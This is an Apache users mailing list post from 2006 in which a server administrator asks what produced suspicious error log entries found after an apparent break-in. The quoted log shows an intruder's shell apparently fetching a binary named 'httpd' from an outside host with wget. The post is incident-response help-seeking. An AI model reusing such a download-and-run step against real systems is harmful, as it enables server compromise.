Hi folks,
I sent this last night but didn't see it come through and I realize that I
did not mention that this occurred on a linux server running apache
1.3.34.
Thanks for any advice or suggestions.
Thanks,
Jim.
James R. Hay [EMAIL PROTECTED]
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4
---------- Forwarded message ----------
Date: Sat, 28 Jan 2006 01:38:50 -0500 (EST)
From: James R. Hay <[EMAIL PROTECTED]>
To: users@httpd.apache.org
Subject: Origin of error log entries?
The entries below were found in the Apache error log while investigating on
apparent exploit. Thus far I have not found any corresponding access log entry
and I am wondering if this is an indication that the intruder gained a shell?
httpd(315): Operation not permitted
sh: line 1: fetch: command not found
--00:44:12-- http://members.lycos.co.uk/img00d/httpd
=> `httpd'
Resolving members.lycos.co.uk... done.
Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,662 [text/plain]
0K .......... .......... ........ 100% 68.00 KB/s
00:44:13 (68.00 KB/s) - `httpd' saved [29662/29662]
php.cgi: no process killed
This begs the question of what is the source of entries for the error log? THe
virtual domains have their own logs and there should be no entries for any
websites in the main access or error logs.
Any suggestions would be appreciated.
Thanks,
Jim.
James R. Hay [EMAIL PROTECTED]
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
" from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
